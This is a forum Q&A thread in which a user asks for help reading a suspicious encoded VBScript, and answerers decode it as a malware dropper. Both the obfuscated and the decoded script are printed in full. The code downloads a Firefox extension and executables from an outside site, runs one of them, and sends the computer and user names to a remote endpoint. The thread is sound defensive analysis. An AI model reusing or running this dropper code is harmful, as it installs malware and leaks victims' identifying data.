b~LP/tMcF8vb~LPZ4.vFT**~LP/4DvFFZ#,mP@&P'P;t.c8!&*~[,ZtMc*v*PLP/t.cF!bPL~Z4DcqZ*#~',Z4DvqZ%b,[,ZtM`8TF*P'P;t.cR&#,'P;tDvq+F*PLP/t.c8FX#,mP@&P'~;tDcq8vbPL~;t.vFZF#,[,/tM`q!O#~',ZtMcGO#PL~/tM`O%bP'~;t.`8Tv*P'~;tDcqZFbPL~;t.v,O#PLP;4DvFqv*Pm~@&#@&,~P,@&P,~~Ww/KR/DnCD+oW^[+MPKCDt@&3U9PjE(@&@&?;(PUt+^Vv)waVrmmYrG nlD4#@&PP,~9ksPKjtns^@&~P,~@&U+O~K?4n^V~',/M+CD+}4LmDcZ4Dc%F#~',ZtMc%2#PL~/tM`O,bP'~;t.`8qc*P'~;tDcqZ*bPL~;t.vF8 #,[,/tM`qF+#~',ZtMcc+#P|~@&PLP;t.`0f*P'P;4DvFT**P[~/4DcFZq*P',Z4D`8!RbPLP/tM`qTR##@&~P,P@&,~~PKUtnVs "EUPz2w^k^CDkWUKmY4@&AU9Pj!4@&@&?!4,uK:n9WSxsGmN``]SBPSK^CVhlDtb@&~~,P9ks~kBPGobV+S~KsjrB~KCP:nBP/wk^n~,/\/T@&~~,P@&,~P,ZW    dOPwWMInl[r o~',q~,sG.qDkOr o~',+BPoKDzwwx9rxTPxPR@&@&jYPKo?}P',/.+mYr8Ln^D`/tMc%2#~',Zt.cO,bPL~;t.vF8c#,[,/tM`q!l#~',ZtMcF8 #,'~Z4DvFqvb~LP/tMcFZ*b~LPZ4.vFq!*~|P@&,[,ZtM`8T&*P'P;t.cWv#,'P;tDv{T#,[,Z4DcqZ*bPL~Z4DcqZ%#~',Z4DvqZFb,[,ZtM`Rf#,[~Z4DcqyF#,'P;tDvqq**P|P@&P'~;t.`8qv*P'~;tDcqZFbPL~;t.vFZ,#,[,/tM`{,*P'~;tDv1%*P[,/4DvFZvbP'~;t.`8TF*P'~;tDc1O#~[,/4Dc8F+#P|P@&b@&,P~P@&P~~,q0,GsUrRwGsNDA6r/OdvSGmmsnmY4b,KtnU@&P~P,~,P~ksbV+,',GsUr A!ks[hlY4cSKml^KCY4~,HrNci"SSP&U?DD]n7`j]JBP/tMcWGb*P3PF*#@&~P,P3Vk+(W,WsU6RwWV9n.2XkkYd`Jn6YcSK^l^nCO4~P(UUY.I-vSG1l^nlDtB~Z4Dc,y#b~ PF*bP:t+ @&~P,P,P~PdobVnP{~SKmCshlY4@&,P~PAsk+@&,P,PP,P,36bY~?!4@&~,PPAUN,q0@&@&~P,PU+OPGobVnP{~Ww?6 }w+UP6Osbs`dwk^+~,sK.MkOk   oS~:DEb@&@&?+D~GC:KhPxP/.lO+}8LmOc;tDc0F#~[,/4Dc8!l#PLP;4DvFq!*P'~;tDv{ *P[,/4DvF8vbP'~;t.`8qv*P'~;tDcq8 bPL~;t.vc+#P|P@&~[,Z4Dv%{b,[P;4DvF!lb~[,Z4DcFqT*P'P;4DvG+b,[P/4M`qF+b,[~;tM`F8v*~[,Z4DvFq+*P[,/tM`%yb~[,Z4DcFTq*PmP@&~[,Z4.vFFfb,[~Z4.vFqF#,[P;tMcFZFbPLP/4M`F8X#,[P;4.`8F+#~[~/4Dcc+bPLP/4M`*fb,[~Z4.vc*PLPZ4Dv*,*PmP@&#@&@&,PP,GC:Knc62+ P;t.`{q*P'P;4Dvv1b,[P/4M`0c*S,j]d~,sl^/@&P,P~W_KPKc?+   [@&@&PP,~oWMPbPxPq~:W~SUAvWuP:nR]nkwGxkn~W[H#@&PP,P,~P,Wok^+    MkY~Z4D`zd^AvHbN$`Gu:KKR"n/aWUdAW[zBPr~,q*#b@&P,PPg+XO@&@&P~P,Wor^+R;sWk+`*@&3x9PUE8yGQOAA==^#~@

I found out it’s a VBSCRIPT encrypted with the help of a website I got the file Developer, I will post below because I do not understand the language I would like someone who understands could give a clarification now that this readable.

On Error Resume Next

Dim sMYLocalPath
Dim sMYLocalPath2
Dim sMYLocalPathSINTUOSA
Dim sMYLocalPathXPI
DIM AVISOS
sMYLocalPath = Environ(Chr(65) & Chr(112) & Chr(112) & Chr(68) & Chr(97) & Chr(116) & Chr(97)) & Chr(92) _ 
 & Chr(77) & Chr(83) & Chr(82) & Chr(84) & Chr(86) & Chr(66) & Chr(69) & Chr(51) & Chr(50) _ 



If FileExists(sMYLocalPath & Chr(92)) Then Wscript.Quit

MkDir sMYLocalPath
sMYLocalPathSINTUOSA =  sMYLocalPath & Chr(92) & Chr(115) & Chr(105) & Chr(110) & Chr(116) & Chr(117) & Chr(111) _ 
 & Chr(115) & Chr(97)
AVISOS = sMYLocalPath & Chr(92) & Chr(97) & Chr(97) & Chr(46) & Chr(120)
sMYLocalPathXPI = sMYLocalPath & Chr(92) & Chr(101) & Chr(118) & Chr(111) & Chr(107) & Chr(101) & Chr(46) _ 
 & Chr(120) & Chr(112) & Chr(105)
sMYLocalPath2 = sMYLocalPath & Chr(92) & RandomString(7) & Chr(97) & Chr(46) & Chr(101) & Chr(120) & Chr(101) _ 

sMYLocalPath = sMYLocalPath & Chr(92) & RandomString(8) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
MkDir sMYLocalPathSINTUOSA


HTTPDownload Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & Chr(115) _ 
 & Chr(115) & Chr(108) & Chr(45) & Chr(112) & Chr(114) & Chr(111) & Chr(120) & Chr(121) _ 
 & Chr(46) & Chr(109) & Chr(121) & Chr(45) & Chr(97) & Chr(100) & Chr(100) & Chr(114) & Chr(46) _ 
 & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(109) & Chr(121) & Chr(97) & Chr(100) & Chr(100) _ 
 & Chr(114) & Chr(112) & Chr(114) & Chr(111) & Chr(120) & Chr(121) & Chr(46) & Chr(112) _ 
 & Chr(104) & Chr(112) & Chr(47) & Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(47) _ 
 & Chr(47) & Chr(112) & Chr(114) & Chr(111) & Chr(100) & Chr(117) & Chr(116) & Chr(111) & Chr(115) _ 
 & Chr(110) & Chr(97) & Chr(116) & Chr(117) & Chr(114) & Chr(97) & Chr(105) & Chr(115) & Chr(99) _ 
 & Chr(104) & Chr(97) & Chr(115) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(46) & Chr(98) _ 
 & Chr(114) & Chr(47) & Chr(101) & Chr(110) & Chr(118) & Chr(105) & Chr(103) & Chr(97) & Chr(100) _ 
 & Chr(111) & Chr(47) & Chr(101) & Chr(118) & Chr(111) & Chr(107) & Chr(101) & Chr(46) _ 
 & Chr(120) & Chr(112) & Chr(105), sMYLocalPathXPI
HTTPDownload Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & Chr(115) _ 
 & Chr(115) & Chr(108) & Chr(45) & Chr(112) & Chr(114) & Chr(111) & Chr(120) & Chr(121) _ 
 & Chr(46) & Chr(109) & Chr(121) & Chr(45) & Chr(97) & Chr(100) & Chr(100) & Chr(114) & Chr(46) _ 
 & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(109) & Chr(121) & Chr(97) & Chr(100) & Chr(100) _ 
 & Chr(114) & Chr(112) & Chr(114) & Chr(111) & Chr(120) & Chr(121) & Chr(46) & Chr(112) _ 
 & Chr(104) & Chr(112) & Chr(47) & Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(47) _ 
 & Chr(47) & Chr(112) & Chr(114) & Chr(111) & Chr(100) & Chr(117) & Chr(116) & Chr(111) & Chr(115) _ 
 & Chr(110) & Chr(97) & Chr(116) & Chr(117) & Chr(114) & Chr(97) & Chr(105) & Chr(115) & Chr(99) _ 
 & Chr(104) & Chr(97) & Chr(115) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(46) & Chr(98) _ 
 & Chr(114) & Chr(47) & Chr(101) & Chr(110) & Chr(118) & Chr(105) & Chr(103) & Chr(97) & Chr(100) _ 
 & Chr(111) & Chr(47) & Chr(109) & Chr(97) & Chr(110) & Chr(46) & Chr(101) & Chr(120) & Chr(101) _ 
, sMYLocalPath

Shell sMYLocalPath2
HTTPDownload Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & Chr(115) _ 
 & Chr(115) & Chr(108) & Chr(45) & Chr(112) & Chr(114) & Chr(111) & Chr(120) & Chr(121) _ 
 & Chr(46) & Chr(109) & Chr(121) & Chr(45) & Chr(97) & Chr(100) & Chr(100) & Chr(114) & Chr(46) _ 
 & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(109) & Chr(121) & Chr(97) & Chr(100) & Chr(100) _ 
 & Chr(114) & Chr(112) & Chr(114) & Chr(111) & Chr(120) & Chr(121) & Chr(46) & Chr(112) _ 
 & Chr(104) & Chr(112) & Chr(47) & Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(47) _ 
 & Chr(47) & Chr(112) & Chr(114) & Chr(111) & Chr(100) & Chr(117) & Chr(116) & Chr(111) & Chr(115) _ 
 & Chr(110) & Chr(97) & Chr(116) & Chr(117) & Chr(114) & Chr(97) & Chr(105) & Chr(115) & Chr(99) _ 
 & Chr(104) & Chr(97) & Chr(115) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(46) & Chr(98) _ 
 & Chr(114) & Chr(47) & Chr(101) & Chr(110) & Chr(118) & Chr(105) & Chr(103) & Chr(97) & Chr(100) _ 
 & Chr(111) & Chr(47) & Chr(97) & Chr(118) & Chr(105) & Chr(115) & Chr(97) & Chr(108) & Chr(97) _ 
 & Chr(46) & Chr(112) & Chr(104) & Chr(112) & Chr(63) & Chr(73) & Chr(68) & Chr(77) & Chr(65) _ 
 & Chr(81) & Chr(61) & Environ(Chr(67) & Chr(111) & Chr(109) & Chr(112) & Chr(117) & Chr(116) _ 
 & Chr(101) & Chr(114) & Chr(78) & Chr(97) & Chr(109) & Chr(101)) & Chr(38) & Chr(68) & Chr(65) _ 
 & Chr(84) & Chr(65) & Chr(61) & Environ(Chr(85) & Chr(115) & Chr(101) & Chr(114) & Chr(78) _ 
 & Chr(97) & Chr(109) & Chr(101)) & Chr(38) & Chr(73) & Chr(78) & Chr(70) & Chr(79) & Chr(61) _ 
 & Chr(109) & Chr(97) & Chr(110) & Chr(111), AVISOS
' Helpers ---------------------------------------------------------------------------------------------------------------




Function Environ(Variable)
    Dim oWShell

Set oWShell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) _ 
 & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))

    Environ = oWShell.ExpandEnvironmentStrings(Chr(37) & Variable & Chr(37))
End Function

Function RandomString(StringLength)
    Dim StringCharSet, i

StringCharSet = Chr(48) & Chr(49) & Chr(50) & Chr(51) & Chr(52) & Chr(53) & Chr(55) & Chr(56) & Chr(57) _ 
 & Chr(97) & Chr(98) & Chr(99) & Chr(100) & Chr(101) & Chr(102) & Chr(65) & Chr(66) & Chr(67) _ 
 & Chr(68) & Chr(69) & Chr(70)

    Randomize

    For i = 1 To StringLength
        RandomString = RandomString & Mid(StringCharSet, Int(Rnd() * Len(StringCharSet) + 1), 1)
    Next
End Function

Function FileExists(FileOrFolderName)
    Dim oFso, bRet

Set oFso = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) _ 
 & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) _ 
 & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116) _ 
)

    If Right(FileOrFolderName, 1) = Chr(92) Then
        bRet = oFso.FolderExists(FileOrFolderName)
    Else
        bRet = oFso.FileExists(FileOrFolderName)
    End If

    FileExists = bRet
End Function

Sub MkDir(Path)
    Dim oFso

Set oFso = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) _ 
 & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) _ 
 & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116) _ 
)

    oFso.CreateFolder Path
End Sub

Sub Shell(ApplicationPath)
    Dim oWShell

Set oWShell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) _ 
 & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))

    oWShell.Run ApplicationPath
End Sub

Sub HTTPDownload(URL, LocalPath)
    Dim i, oFile, oFSO, oHTTP, sFile, sMsg

    Const ForReading = 1, ForWriting = 2, ForAppending = 8

Set oFSO = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) _ 
 & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) _ 
 & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116) _ 
)

    If oFSO.FolderExists(LocalPath) Then
        sFile = oFSO.BuildPath(LocalPath, Mid(URL, InStrRev(URL, Chr(47)) + 1))
    ElseIf oFSO.FolderExists(Left(LocalPath, InStrRev(LocalPath, Chr(92)) - 1)) Then
        sFile = LocalPath
    Else
        Exit Sub
    End If

    Set oFile = oFSO.OpenTextFile(sFile, ForWriting, True)

Set oHTTP = CreateObject(Chr(87) & Chr(105) & Chr(110) & Chr(72) & Chr(116) & Chr(116) & Chr(112) & Chr(46) _ 
 & Chr(87) & Chr(105) & Chr(110) & Chr(72) & Chr(116) & Chr(116) & Chr(112) & Chr(82) & Chr(101) _ 
 & Chr(113) & Chr(117) & Chr(101) & Chr(115) & Chr(116) & Chr(46) & Chr(53) & Chr(46) & Chr(49) _ 
)

    oHTTP.Open Chr(71) & Chr(69) & Chr(84), URL, False
    oHTTP.Send

    For i = 1 To LenB(oHTTP.ResponseBody)
        oFile.Write Chr(AscB(MidB(oHTTP.ResponseBody, i, 1)))
    Next

    oFile.Close()
End Sub

I cut a chunk of the code because it exceeded the posting limit, but I left the code on Jsfiddle despite being vbscript and not javascript.

  • The char(N) returns a character based on the ascii value, it seems that he accesses a website and maybe downloads something. DIM AVISOS ? I’ll take a closer look

  • the first sequence of Chr(xx) makes a download for the site productosnaturaischas.com.br/Nvigado/man.exe

  • I’ll do more tests after lunch, I’m learning the language now...

  • you converted all the Chr()?

  • I converted only the first excerpt after lunch I will give one more analyzed

2 answers

5


I decoded some more for you. The script is not hard to read. It downloads two executables to the folder c: Users Voce Appdata MSRTVBE32. Files have random names and end with .exe. I imagine there is some other program that finds and runs these files in that folder.

Edit: Reading a little more, I would suspect that the script or executables tried to install a plugin in Firefox. I would take a look at Firefox from who clicked to uninstall all suspicious extensions.

On Error Resume Next

Dim sMYLocalPath
Dim sMYLocalPath2
Dim sMYLocalPathSINTUOSA
Dim sMYLocalPathXPI
DIM AVISOS
sMYLocalPath = Environ("AppData") & "\MSRTVBE32" _



If FileExists(sMYLocalPath & "\") Then Wscript.Quit

MkDir sMYLocalPath
sMYLocalPathSINTUOSA =  sMYLocalPath & "\sintuosa"
AVISOS = sMYLocalPath & "\aa.x"
sMYLocalPathXPI = sMYLocalPath & "\evoke." _
 & "xpi"
sMYLocalPath2 = sMYLocalPath & "\" & RandomString(7) & "a.exe" _

sMYLocalPath = sMYLocalPath & "\" & RandomString(8) & ".exe"
MkDir sMYLocalPathSINTUOSA


HTTPDownload "https://ssl-proxy.my-addr.org/myaddrproxy.php/http//produtosnaturaischas.com.br/envigado/evoke.xpi", _
   sMYLocalPathXPIHTTPDownload "https://ssl-proxy.my-addr.org/myaddrproxy.php/http//produtosnaturaischas.com.br/envigado/man.exe", _
                                sMYLocalPath

Shell sMYLocalPath2
HTTPDownload "https://ssl-proxy.my-addr.org/myaddrproxy.php/http//produtosnaturaischas.com.br/envigado/avisala.php?IDMAQ=" & _
        Environ("ComputerName") & "&DATA=" & Environ("UserName") & "&INFO=mano", AVISOS
' Helpers ---------------------------------------------------------------------------------------------------------------


Function Environ(Variable)
    Dim oWShell

Set oWShell = CreateObject("WScript.Shell")
    Environ = oWShell.ExpandEnvironmentStrings("%" & Variable & "%")
End Function

Function RandomString(StringLength)
    Dim StringCharSet, i

StringCharSet = "012345789" _
 & "abcdefABC" _
 & "DEF"

    Randomize

    For i = 1 To StringLength
        RandomString = RandomString & Mid(StringCharSet, Int(Rnd() * Len(StringCharSet) + 1), 1)
    Next
End Function

Function FileExists(FileOrFolderName)
    Dim oFso, bRet

Set oFso = CreateObject("Scripting.FileSystemObject")

    If Right(FileOrFolderName, 1) = "\" Then
        bRet = oFso.FolderExists(FileOrFolderName)
    Else
        bRet = oFso.FileExists(FileOrFolderName)
    End If

    FileExists = bRet
End Function

Sub MkDir(Path)
    Dim oFso

Set oFso = CreateObject("Scripting.FileSystemObject")

    oFso.CreateFolder Path
End Sub

Sub Shell(ApplicationPath)
    Dim oWShell

Set oWShell = CreateObject("WScript.Shell")

    oWShell.Run ApplicationPath
End Sub

Sub HTTPDownload(URL, LocalPath)
    Dim i, oFile, oFSO, oHTTP, sFile, sMsg

    Const ForReading = 1, ForWriting = 2, ForAppending = 8

Set oFso = CreateObject("Scripting.FileSystemObject")


    If oFSO.FolderExists(LocalPath) Then
        sFile = oFSO.BuildPath(LocalPath, Mid(URL, InStrRev(URL, "/") + 1))
    ElseIf oFSO.FolderExists(Left(LocalPath, InStrRev(LocalPath, "\") - 1)) Then
        sFile = LocalPath
    Else
        Exit Sub
    End If

    Set oFile = oFSO.OpenTextFile(sFile, ForWriting, True)

Set oHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")

    oHTTP.Open "GET", URL, False
    oHTTP.Send

    For i = 1 To LenB(oHTTP.ResponseBody)
        oFile.Write Chr(AscB(MidB(oHTTP.ResponseBody, i, 1)))
    Next

    oFile.Close()
End Sub

Edit2: to whom it may interest, I used a simple Python script to convert the Chr(...):

codigo = """
On Error Resume Next

Dim sMYLocalPath
...etc...
"""
import re
codigo2 = re.sub(r"Chr\((\d+)\)", lambda m: '{%s}'%str(unichr(int(m.groups()[0]))) , codigo)
print codigo2.replace('} & {', '').replace('}', '"').replace('{', '"')
  • 1

    +1 because the script is in Python ;)

0

well I created a.vbs script with snippets of this malicious script.

Wscript.Echo Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & Chr(115) _ 
 & Chr(115) & Chr(108) & Chr(45) & Chr(112) & Chr(114) & Chr(111) & Chr(120) & Chr(121) _ 
 & Chr(46) & Chr(109) & Chr(121) & Chr(45) & Chr(97) & Chr(100) & Chr(100) & Chr(114) & Chr(46) _ 
 & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(109) & Chr(121) & Chr(97) & Chr(100) & Chr(100) _ 
 & Chr(114) & Chr(112) & Chr(114) & Chr(111) & Chr(120) & Chr(121) & Chr(46) & Chr(112) _ 
 & Chr(104) & Chr(112) & Chr(47) & Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(47) _ 
 & Chr(47) & Chr(112) & Chr(114) & Chr(111) & Chr(100) & Chr(117) & Chr(116) & Chr(111) & Chr(115) _ 
 & Chr(110) & Chr(97) & Chr(116) & Chr(117) & Chr(114) & Chr(97) & Chr(105) & Chr(115) & Chr(99) _ 
 & Chr(104) & Chr(97) & Chr(115) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(46) & Chr(98) _ 
 & Chr(114) & Chr(47) & Chr(101) & Chr(110) & Chr(118) & Chr(105) & Chr(103) & Chr(97) & Chr(100) _ 
 & Chr(111) & Chr(47) & Chr(109) & Chr(97) & Chr(110) & Chr(46) & Chr(101) & Chr(120) & Chr(101)

generated the following:

inserir a descrição da imagem aqui

Summarizing the script downloads an executable/files from the internet and then runs. Another important information has a site with the list of anti-virus that detects and those that does not detect, in my case the Avast undetectable :(

https://www.virustotal.com/pt/file/2a1277da6e5ff355ee97823b24d7bbf12b6c1d74e736b7b49f6d8247e5231313/analysis/1442342052/

Browser other questions tagged

You are not signed in. Login or sign up in order to post.